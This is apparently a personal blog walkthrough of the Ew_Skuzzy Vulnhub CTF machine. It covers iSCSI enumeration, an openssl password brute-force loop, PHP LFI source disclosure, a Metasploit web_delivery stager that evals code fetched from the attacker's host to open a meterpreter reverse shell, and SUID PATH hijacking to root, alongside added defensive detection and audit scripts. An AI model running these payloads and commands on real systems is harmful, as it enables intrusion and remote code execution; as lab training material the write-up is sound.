CTF Ew_Skuzzy from @vortexau (Vulnhub)

Ok, I discovered that I love this CTF shit, ahah! I will try to crack Ew_Skuzzy from @vortexau. You can find it on Vulnhub HERE. As usual you can contact me on Twitter @marghost.

First things first: nmap.

root@kali:~# nmap -T4 -A -v 192.168.1.23

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-03-23 23:32 EDT
NSE: Loaded 140 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 23:32
Completed NSE at 23:32, 0.00s elapsed
Initiating NSE at 23:32
Completed NSE at 23:32, 0.00s elapsed
Initiating ARP Ping Scan at 23:32
Scanning 192.168.1.23 [1 port]
Completed ARP Ping Scan at 23:32, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 23:32
Completed Parallel DNS resolution of 1 host. at 23:32, 0.00s elapsed
Initiating SYN Stealth Scan at 23:32
Scanning 192.168.1.23 [1000 ports]
Discovered open port 80/tcp on 192.168.1.23
Discovered open port 22/tcp on 192.168.1.23
Discovered open port 3260/tcp on 192.168.1.23
Completed SYN Stealth Scan at 23:32, 0.06s elapsed (1000 total ports)
Initiating Service scan at 23:32
Scanning 3 services on 192.168.1.23
Completed Service scan at 23:34, 93.78s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.23
NSE: Script scanning 192.168.1.23.
Initiating NSE at 23:34
Completed NSE at 23:34, 0.10s elapsed
Initiating NSE at 23:34
Completed NSE at 23:34, 1.02s elapsed
Nmap scan report for 192.168.1.23
Host is up (0.00032s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 89:c2:ae:12:d6:c5:19:4e:68:4a:28:e9:06:bd:9c:19 (RSA)
|_  256 f0:0c:ae:37:10:d3:6d:a2:85:3a:77:04:06:94:f8:0a (ECDSA)
80/tcp   open  http    nginx
| http-methods:
|_  Supported Methods: GET HEAD
|_http-server-header: nginx
|_http-title: Welcome!
3260/tcp open  iscsi?
|_iscsi-info: ERROR: Script execution failed (use -d to debug)
MAC Address: 08:00:27:60:88:83 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Uptime guess: 0.000 days (since Thu Mar 23 23:33:47 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.31 ms 192.168.1.23

NSE: Script Post-scanning.
Initiating NSE at 23:34
Completed NSE at 23:34, 0.00s elapsed
Initiating NSE at 23:34
Completed NSE at 23:34, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.65 seconds
Raw packets sent: 1023 (45.806KB) | Rcvd: 1015 (41.290KB)

Ok, so a web server and something named iSCSI.

Nikto told me nothing.

DirBuster with the medium 2.3 dictionary told me nothing either.

dirb with the big.txt wordlist found an smblogin directory. Everything under it is forbidden and I can't find anything about it on Google. I keep this in mind.

root@kali:~# dirb http://192.168.1.23 /usr/share/dirb/wordlists/big.txt

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Fri Mar 24 00:40:35 2017
URL_BASE: http://192.168.1.23/
WORDLIST_FILES: /usr/share/dirb/wordlists/big.txt

-----------------

GENERATED WORDS: 20458

---- Scanning URL: http://192.168.1.23/ ----
==> DIRECTORY: http://192.168.1.23/smblogin/

---- Entering directory: http://192.168.1.23/smblogin/ ----
==> DIRECTORY: http://192.168.1.23/smblogin/custom-log/

---- Entering directory: http://192.168.1.23/smblogin/custom-log/ ----
==> DIRECTORY: http://192.168.1.23/smblogin/custom-log/refer/

---- Entering directory: http://192.168.1.23/smblogin/custom-log/refer/ ----
==> DIRECTORY: http://192.168.1.23/smblogin/custom-log/refer/del/

---- Entering directory: http://192.168.1.23/smblogin/custom-log/refer/del/ ----
==> DIRECTORY: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/

---- Entering directory: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/ ----
==> DIRECTORY: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/

---- Entering directory: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/ ----
==> DIRECTORY: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/

---- Entering directory: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/ ----
==> DIRECTORY: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/

---- Entering directory: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/ ----
==> DIRECTORY: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/

---- Entering directory: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/ ----
==> DIRECTORY: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/

---- Entering directory: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/ ----
==> DIRECTORY: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/

---- Entering directory: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/ ----
==> DIRECTORY: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/

---- Entering directory: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/ ----
==> DIRECTORY: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/

---- Entering directory: http://192.168.1.23/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/ ----

-----------------
END_TIME: Fri Mar 24 00:42:14 2017
DOWNLOADED: 286412 - FOUND: 0

Next I am investigating the unusual iSCSI port 3260. I do not know this one, but Google does. It seems to be a sort of network disk that can be mounted like a local drive. Let's do that.

sudo apt-get install open-iscsi
nano /etc/iscsi/iscsid.conf (set node.startup to automatic)
root@kali:~# /etc/init.d/open-iscsi restart
[ ok ] Restarting open-iscsi (via systemctl): open-iscsi.service.
root@kali:~# iscsiadm -m discovery -t st -p 192.168.1.23
192.168.1.23:3260,1 iqn.2017-02.local.skuzzy:storage.sys0
root@kali:~# iscsiadm -m node
192.168.1.23:3260,1 iqn.2017-02.local.skuzzy:storage.sys0
root@kali:~# iscsiadm -m node --targetname "iqn.2017-02.local.skuzzy:storage.sys0" --portal "192.168.1.23:3260" --login
Logging in to [iface: default, target: iqn.2017-02.local.skuzzy:storage.sys0, portal: 192.168.1.23,3260] (multiple)
Login to [iface: default, target: iqn.2017-02.local.skuzzy:storage.sys0, portal: 192.168.1.23,3260] successful.

First Flag!! :

root@kali:~# cd /media/root/e0ca44be-b1ed-403a-84bd-db5558d6bb7e/
root@kali:/media/root/e0ca44be-b1ed-403a-84bd-db5558d6bb7e# ls
bobsdisk.dsk flag1.txt lost+found
root@kali:/media/root/e0ca44be-b1ed-403a-84bd-db5558d6bb7e# cat flag1.txt
Congratulations! You've discovered the first flag!

flag1{c0abc15976b98a478150c900ebb0c86f0327f4dd}

Let's see how you go with the next one...

Ok, next, in that mounted volume I see a file named bobsdisk.dsk. I will mount that as well (as a loop device) to find out what it is:

root@kali:/media/root/e0ca44be-b1ed-403a-84bd-db5558d6bb7e# mkdir /bobsdisk
root@kali:/media/root/e0ca44be-b1ed-403a-84bd-db5558d6bb7e# mount -o loop bobsdisk.dsk /bobsdisk
root@kali:/media/root/e0ca44be-b1ed-403a-84bd-db5558d6bb7e# cd /bobsdisk/
root@kali:/bobsdisk# ls
lost+found ToAlice.csv.enc ToAlice.eml

Flag 2 is inside ToAlice.eml, along with a clue.

PS: Oh, before I forget, the hacker-kid who told me how to use this new algorithm, said it was very important I used the command option -md sha256 when decrypting. Why? Who knows? He said something about living on the bleeding-edge...

PPS: flag2{054738a5066ff56e0a4fc9eda6418478d23d3a7f}

Ok, so Bobby here seems to want me to decrypt the CSV file... jeez, decryption is not my cup of tea... Wikipedia tells me that the algorithm picked in October 2000 was aes-256-cbc. I tried to decrypt with the flag as the passphrase but, suuuuure, it didn't work. I saw ROCKYOU in capitals in the message, so I will use the rockyou.txt password list. I need to try them all...
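To see why Bob's "-md sha256" hint matters, here is an added example (mine, not code from the original post or from the VM) of OpenSSL's legacy EVP_BytesToKey derivation in Python. "openssl enc" stores an 8-byte salt after the "Salted__" header and hashes the passphrase and salt with the chosen digest to produce the AES-256 key and the CBC IV; older builds defaulted to MD5 and newer ones to SHA-256, so the same passphrase gives a different key unless both sides agree on "-md". The passphrase and salt bytes below are constructed for illustration, not taken from ToAlice.csv.enc.

```python
import hashlib

# Layout written by "openssl enc -salt": 8-byte magic, 8-byte salt, ciphertext.
SALTED_MAGIC = b"Salted__"


def split_openssl_header(blob: bytes):
    """Return (salt, ciphertext) from an 'openssl enc' output blob."""
    if len(blob) < 16 or blob[:8] != SALTED_MAGIC:
        raise ValueError("not an OpenSSL Salted__ blob")
    return blob[8:16], blob[16:]


def evp_bytes_to_key(password: bytes, salt: bytes, key_len: int, iv_len: int, digest: str):
    """Legacy OpenSSL EVP_BytesToKey with an iteration count of 1.

    D_1 = H(password || salt), D_i = H(D_{i-1} || password || salt);
    key || iv is the prefix of D_1 || D_2 || ... of the requested length.
    The digest H is what "-md" selects; a mismatch yields a wrong key and
    the decryption fails (or, occasionally, "succeeds" with garbage).
    """
    derived = b""
    prev = b""
    while len(derived) < key_len + iv_len:
        prev = hashlib.new(digest, prev + password + salt).digest()
        derived += prev
    return derived[:key_len], derived[key_len:key_len + iv_len]


def derive_aes256_cbc(password: bytes, salt: bytes, digest: str):
    """aes-256-cbc needs a 32-byte key and a 16-byte IV."""
    return evp_bytes_to_key(password, salt, 32, 16, digest)


def digests_agree(password: bytes, salt: bytes) -> bool:
    """True only if the md5 and sha256 derivations give the same key material."""
    return derive_aes256_cbc(password, salt, "md5") == derive_aes256_cbc(password, salt, "sha256")


if __name__ == "__main__":
    # Constructed sample blob: arbitrary salt and dummy ciphertext, not Bob's file.
    sample_blob = SALTED_MAGIC + bytes(range(8)) + b"\x00" * 32
    salt, _ciphertext = split_openssl_header(sample_blob)
    for digest in ("md5", "sha256"):
        key, iv = derive_aes256_cbc(b"constructed-passphrase", salt, digest)
        print(f"{digest:6} key={key.hex()} iv={iv.hex()}")
    print("same key material:", digests_agree(b"constructed-passphrase", salt))
```

The "-md" flag is only needed because this key derivation is the old password-based scheme; a file produced with "openssl enc -pbkdf2" carries the same header but derives the key with PBKDF2 instead, which this function does not model.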

A little Google search and I found a script that will do the job for me, from http://stackoverflow.com/questions/25114571/decrypt-openssl-bruteforce (lightly fixed here to read the list line by line and quote the password):

#!/bin/bash
# Try every candidate from rockyou.txt against the encrypted file.
# Read line by line so candidates containing spaces stay intact.
mkdir -p ./working

while IFS= read -r PASSWORD; do
    if openssl enc -d -aes-256-cbc -in ToAlice.csv.enc -out ToAlice.csv -md sha256 -k "$PASSWORD" 2>/dev/null; then
        # openssl returns 0 whenever the final padding block checks out, so a
        # wrong password can still slip through; keep every hit for inspection.
        cp ToAlice.csv "./working/ToAlice_$PASSWORD.csv"
    fi
done < ./rockyou.txt

So after 16 hours... dammit XD, I found hundreds of ToAlice_X.csv files in the working directory! (openssl only validates the padding of the last block, so plenty of wrong passwords "decrypt" without an error and the real one has to be picked out by content.)

root@kali:~/decrypt/working# grep  "flag" ./*
./ToAlice_supercalifragilisticoespialidoso.csv:flag3{2cce194f49c6e423967b7f72316f48c5caf46e84},The strangest URL I've seen? What is it?

And I have flag number 3. The CSV file contains:

Web Path,Reason 
5560a1468022758dba5e92ac8f2353c0,Black hoodie. Definitely a hacker site! 
c2444910794e037ebd8aaf257178c90b,Nice clean well prepped site. Nothing of interest here.
flag3{2cce194f49c6e423967b7f72316f48c5caf46e84},The strangest URL I've seen? What is it?

Going to the first path, it's a funky website with a marquee, ahah.
Ok ok, I will post the source too :p

<html>
<head>
<title>Hackers! They're everywhere!</title>
</head>
<body bgcolor="black" text="#00ff00">
<center>
<marquee width="50%"><font face="arial, helvetica" size="20">HACKER DETECTED! H$
<!-- Yeah, I'm bringing Marquee back, suckers! Just not in Chrome. Thanks, Google. Firefox is still rocking the marquee tag Ge$ -->
<img src="hacker.jpg" />
</center>
</body>
</html>

<!-- R2VvcmdlIENvc3RhbnphOiBbU291cCBOYXppIGdpdmVzIGhpbSBhIGxvb2tdIE1lZGl1bSB0dXJr ZXkgY2hpbGkuIApbaW5zdGFudGx5IG1vdmVzIHRvIHRoZSBjYXNoaWVyXSAKSmVycnkgU2VpbmZl bGQ6IE1lZGl1bSBjcmFiIGJpc3F1ZS4gCkdlb3JnZSBDb3N0YW56YTogW2xvb2tzIGluIGhpcyBi YWcgYW5kIG5vdGljZXMgbm8gYnJlYWQgaW4gaXRdIEkgZGlkbid0IGdldCBhbnkgYnJlYWQuIApK ZXJyeSBTZWluZmVsZDogSnVzdCBmb3JnZXQgaXQuIExldCBpdCBnby4gCkdlb3JnZSBDb3N0YW56 YTogVW0sIGV4Y3VzZSBtZSwgSSAtIEkgdGhpbmsgeW91IGZvcmdvdCBteSBicmVhZC4gClNvdXAg TmF6aTogQnJlYWQsICQyIGV4dHJhLiAKR2VvcmdlIENvc3RhbnphOiAkMj8gQnV0IGV2ZXJ5b25l IGluIGZyb250IG9mIG1lIGdvdCBmcmVlIGJyZWFkLiAKU291cCBOYXppOiBZb3Ugd2FudCBicmVh ZD8gCkdlb3JnZSBDb3N0YW56YTogWWVzLCBwbGVhc2UuIApTb3VwIE5hemk6ICQzISAKR2Vvcmdl IENvc3RhbnphOiBXaGF0PyAKU291cCBOYXppOiBOTyBGTEFHIEZPUiBZT1UK -->

PFFF, nothing interesting here. The base64 decodes to:

George Costanza: [Soup Nazi gives him a look] Medium turkey chili. 
[instantly moves to the cashier] 
Jerry Seinfeld: Medium crab bisque. 
George Costanza: [looks in his bag and notices no bread in it] I didn't get any bread. 
Jerry Seinfeld: Just forget it. Let it go. 
George Costanza: Um, excuse me, I - I think you forgot my bread. 
Soup Nazi: Bread, $2 extra. 
George Costanza: $2? But everyone in front of me got free bread. 
Soup Nazi: You want bread? 
George Costanza: Yes, please. 
Soup Nazi: $3! 
George Costanza: What? 
Soup Nazi: NO FLAG FOR YOU

Ok, so next I will go and challenge the other website at c2444910794e037ebd8aaf257178c90b.

I thought I would be able to just point the reader at a URL for a web_delivery payload, but it was not so easy: we need a key to do that.
Then I tried to use LFI to get a PHP shell up and running, but even when the resource is included directly I got an auth key demand. (HERE)
So I read more about LFI and found that I can obtain a base64 version of any PHP page I want with this filter wrapper. Thanks Phil at idontplaydart.

?p=php://filter/convert.base64-encode/resource=xxxxxx.php

First of all, I think it's not healthy to be that obsessed with base64, @vortexau!

So with that I obtained the contents of flag.php and reader.php.

Once decoded they look like this.

FLAG 4: flag.php

<?php defined ('VIAINDEX') or die('Ooooh! So close..'); ?>

<h1>Flag</h1>



Hmm. Looking for a flag? Come on... I haven't made it easy yet, did you think I was going to this time?

<img src="trollface.png" />
<?php
// Ok, ok. Here's your flag!
//
// flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}
//
// Well done, you're doing great so far!
// Next step. SHELL!
//
//
// Oh. That flag above? You're gonna need it...
?>

reader.php

<?php defined ('VIAINDEX') or die('Ooooh! So close..'); ?>

<h1>Feed Reader</h1>

<?php
if(isset($_GET['url'])) {
    $url = $_GET['url'];
} else {
    print("<a href=\"?p=reader&url=http://127.0.0.1/c2444910794e037ebd8aaf257178c90b/data.txt\">Load Feed</a>");
}

if(isset($url) && strlen($url) != '') {

    // Setup some variables.
    $secretok = false;
    $keyneeded = true;

    // Localhost as a source doesn't need to use the key.
    if(preg_match("#^http://127.0.0.1#", $url)) {
        $keyneeded = false;
        $secretok = true;
    }

    // Handle the key validation when it's needed.
    if($keyneeded) {
        $key = $_GET['key'];
        if(is_array($key)) {
            die("Array trick is mitigated ;)");
        }
        if(isset($key) && strlen($key) == '47') {
            $hashedkey = hash('sha256', $key);
            $secret = "5ccd0dbdeefbee078b88a6e52db8c1caa8dd8315f227fe1e6aee6bcb6db63656";

            // If you can use the following code for a timing attack
            // then good luck 🙂 But.. You have the source anyway, right? 🙂
            if(strcmp($hashedkey, $secret) == 0) {
                $secretok = true;
            } else {
                die("Sorry... Authentication failed. Key was invalid.");
            }

        } else {
            die("Authentication invalid. You might need a key.");
        }
    }

    // Just to make sure the above key check was passed.
    if(!$secretok) {
        die("Something went wrong with the authentication process");
    }

    // Now load the contents of the file we are reading, and parse
    // the super awesomeness of its contents!
    $f = file_get_contents($url);

    $text = preg_split("/##text##/s", $f);

    if(isset($text['1']) && strlen($text['1']) > 0) {
        print($text['1']);
    }

    print "

";

    $php = preg_split("/##php##/s", $f);

    if(isset($php['1']) && strlen($php['1']) > 0) { 
        eval($php['1']);
        // "If Eval is the answer, you're asking the wrong question!" - SG
        // It hurts me to write insecure code like this, but it is in the
        // name of education, and FUN, so I'll let it slide this time.
    }
}

Ok, so here it is pretty straightforward. We need a 47-character key, and flag.php said we would need that flag, which is exactly 47 characters.
So I will build a special web_delivery stager for Metasploit and we will surely get a shell.

webdeliveryez.php:

##php##
eval(file_get_contents('http://192.168.1.14:8080/LcuwBoqEb'));
print("workin");
##php##

Setting up Metasploit:

msf > use exploit/multi/script/web_delivery 
msf exploit(web_delivery) > set target 1
target => 1
msf exploit(web_delivery) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(web_delivery) > set uripath LcuwBoqEb
uripath => LcuwBoqEb
msf exploit(web_delivery) > set lhost 192.168.1.14
lhost => 192.168.1.14
msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.1.14:4444 
msf exploit(web_delivery) > [*] Using URL: http://0.0.0.0:8080/LcuwBoqEb
[*] Local IP: http://192.168.1.14:8080/LcuwBoqEb
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.1.14:8080/LcuwBoqEb'));"

Then I just accessed the URL:

http://192.168.1.23/c2444910794e037ebd8aaf257178c90b/?p=reader&key=flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}&url=http://192.168.1.14/webdeliveryphpez.php

Annnnnd we got a shell!
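Both tricks used against this site (the php://filter wrapper in the "p" include parameter, and the reader fetching a non-local "url") leave clear traces in the nginx access log. Here is an added example, my own and not part of the original post, of detection logic run over a few constructed "combined"-format log lines; the IPs, timestamps and the staging path are invented, and the key value is a placeholder. It compares the parsed hostname of "url" exactly against the local addresses rather than checking a string prefix the way reader.php does.

```python
import re
from urllib.parse import urlparse, parse_qs, unquote

# Constructed nginx access-log lines (default "combined" format). Addresses,
# timestamps and the staging file name are made up; REDACTED stands in for a key.
SAMPLE_LOG = """\
10.0.0.5 - - [24/Mar/2017:01:02:03 -0400] "GET /c2444910794e037ebd8aaf257178c90b/?p=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [24/Mar/2017:01:02:10 -0400] "GET /c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=reader.php HTTP/1.1" 200 2048 "-" "curl/7.52"
10.0.0.9 - - [24/Mar/2017:01:03:44 -0400] "GET /c2444910794e037ebd8aaf257178c90b/?p=reader&key=REDACTED&url=http://10.0.0.9/stage.php HTTP/1.1" 200 24 "-" "curl/7.52"
10.0.0.5 - - [24/Mar/2017:01:04:00 -0400] "GET /c2444910794e037ebd8aaf257178c90b/?p=reader&url=http://127.0.0.1/c2444910794e037ebd8aaf257178c90b/data.txt HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# ip, timestamp, method, request target and status code from a combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

LOCAL_HOSTS = ("127.0.0.1", "localhost")


def classify_request(target: str):
    """Return a list of finding labels for one request target (path + query string)."""
    findings = []
    qs = parse_qs(urlparse(target).query, keep_blank_values=True)
    # A stream wrapper (php://filter, data://, expect://, ...) inside the page
    # include parameter is the LFI-to-source-disclosure pattern.
    for value in qs.get("p", []):
        if "://" in unquote(value).lower():
            findings.append("wrapper-in-include-param")
    # The feed reader is meant to pull from 127.0.0.1 only; anything else is
    # the server being told to fetch (and eval) outside content.
    for value in qs.get("url", []):
        host = urlparse(unquote(value)).hostname or ""
        if host not in LOCAL_HOSTS:
            findings.append("reader-fetch-non-local:" + (host or "<no host>"))
    return findings


def scan_log(text: str):
    """Parse each line and return (ip, timestamp, findings) for suspicious requests."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = classify_request(m["target"])
        if findings:
            hits.append((m["ip"], m["ts"], findings))
    return hits


if __name__ == "__main__":
    for ip, ts, findings in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} {', '.join(findings)}")
```

Feed it the real log with scan_log(open(path).read()); the second "findings" label carries the host the server was asked to contact, which is usually the attacker's staging box and worth correlating with outbound connections.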

sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 2379 created.
Channel 0 created.
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@skuzzy:~/html/c2444910794e037ebd8aaf257178c90b$ 

Next we need to run some privilege escalation scripts.

I will save you the hassle of the full results here; I read it all and found something interesting:

=================================================================================================
LINUX PRIVILEGE ESCALATION CHECKER
=================================================================================================

[*] GETTING BASIC SYSTEM INFO...

[+] Kernel
 Linux version 4.4.0-64-generic (buildd@lgw01-56) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #85-Ubuntu SMP Mon Feb 20 11:50:30 UTC 2017

[+] Hostname
 skuzzy

[+] Operating System
 [ASCII art banner]
 Intentionally Vulnerable VM! Do not expose to the Internet!
 Developed By - vortex
 twitter: @vortexau
 email: vortex@juicedigital.net
 Hints available at /dev/null (or ping me on Twitter)
 Assigned IP: 192.168.1.23/24

[*] GETTING NETWORKING INFO...
[+] SUID/SGID Files and Directories

 -rwsr-xr-x 1 root root 8736 Mar 2 22:56 /opt/alicebackup

Ok, so here we see a binary named alicebackup that runs with root privileges (SUID root)! Let's fire it up:

www-data@skuzzy:/tmp$ /opt/alicebackup
/opt/alicebackup
uid=0(root) gid=0(root) groups=0(root),33(www-data)
ssh: Could not resolve hostname alice.home: Name or service not known
lost connection

Ok, interesting: the binary runs the id command, tries to connect via ssh, and dies. If I replace the id command with a shell, I think it would work. So let's see:

cp /bin/sh /tmp/id

And next add /tmp at the start of the PATH so it will run mine instead of the real one.

www-data@skuzzy:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
www-data@skuzzy:/tmp$ echo $PATH
echo $PATH
/tmp:/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin:.
www-data@skuzzy:/tmp$ 
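The root cause here is a SUID binary that calls "id" and "ssh" by name through whatever PATH it inherits (note the target's own PATH above even ends in "."). As an added example, mine and not part of the original post or the VM, here is a small Python audit of a PATH value from the defender's side: it flags relative entries and world-writable directories, and builds a sanitized PATH with them removed, which is what a privileged program should set for itself before spawning anything. The world-writable directory in the demo is created on the fly rather than assumed.

```python
import os
import stat
import tempfile


def audit_path(path_value: str):
    """Return [(entry, reason)] for PATH entries a privileged program must not trust.

    Flags "" and "." (the current directory gets searched), any other relative
    entry, and existing directories with the world-writable bit (S_IWOTH) set.
    Missing directories are skipped: nothing can be planted in them.
    """
    findings = []
    for entry in path_value.split(":"):
        if entry in ("", "."):
            findings.append((entry, "relative: current directory is searched"))
            continue
        if not entry.startswith("/"):
            findings.append((entry, "relative path"))
            continue
        try:
            st = os.stat(entry)
        except FileNotFoundError:
            continue
        if stat.S_ISDIR(st.st_mode) and st.st_mode & stat.S_IWOTH:
            findings.append((entry, "world-writable directory"))
    return findings


def sanitize_path(path_value: str) -> str:
    """Drop every flagged entry and return the remaining PATH, order preserved."""
    bad = {entry for entry, _reason in audit_path(path_value)}
    return ":".join(e for e in path_value.split(":") if e not in bad)


if __name__ == "__main__":
    # Constructed demo: a throwaway directory made world-writable, placed first,
    # mirroring the /tmp-first PATH used against alicebackup.
    scratch = tempfile.mkdtemp()
    os.chmod(scratch, 0o1777)
    demo_path = f"{scratch}:/usr/local/bin:/usr/bin:/bin:."
    for entry, reason in audit_path(demo_path):
        print(f"{entry!r}: {reason}")
    print("sanitized:", sanitize_path(demo_path))
    os.rmdir(scratch)
```

For a compiled SUID helper the equivalent fix is to exec "/usr/bin/id" and "/usr/bin/ssh" by absolute path (or set PATH explicitly) instead of trusting the caller's environment; the audit above is useful for spotting the inherited PATH such a helper would otherwise search.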

Exploit it and we see flag 5:


www-data@skuzzy:/tmp$ /opt/alicebackup
/opt/alicebackup
# whoami
whoami
root
# cd /root
cd /root
# ls
ls
flag.txt
# cat flag.txt
cat flag.txt
Congratulations!

flag5{42273509a79da5bf49f9d40a10c512dd96d89f6a}

You've found the final flag and pwned this CTF VM!

I really hope this was an enjoyable challenge, and that my trolling and messing with you didn't upset you too much! I had a blast making this VM, so it won't be my last!

I'd love to hear your thoughts on this one.
Too easy?
Too hard?
Too much stuff to install to get the iSCSI initiator working?

Drop me a line on twitter @vortexau, or via email vortex@juicedigital.net

Like a chief

M.
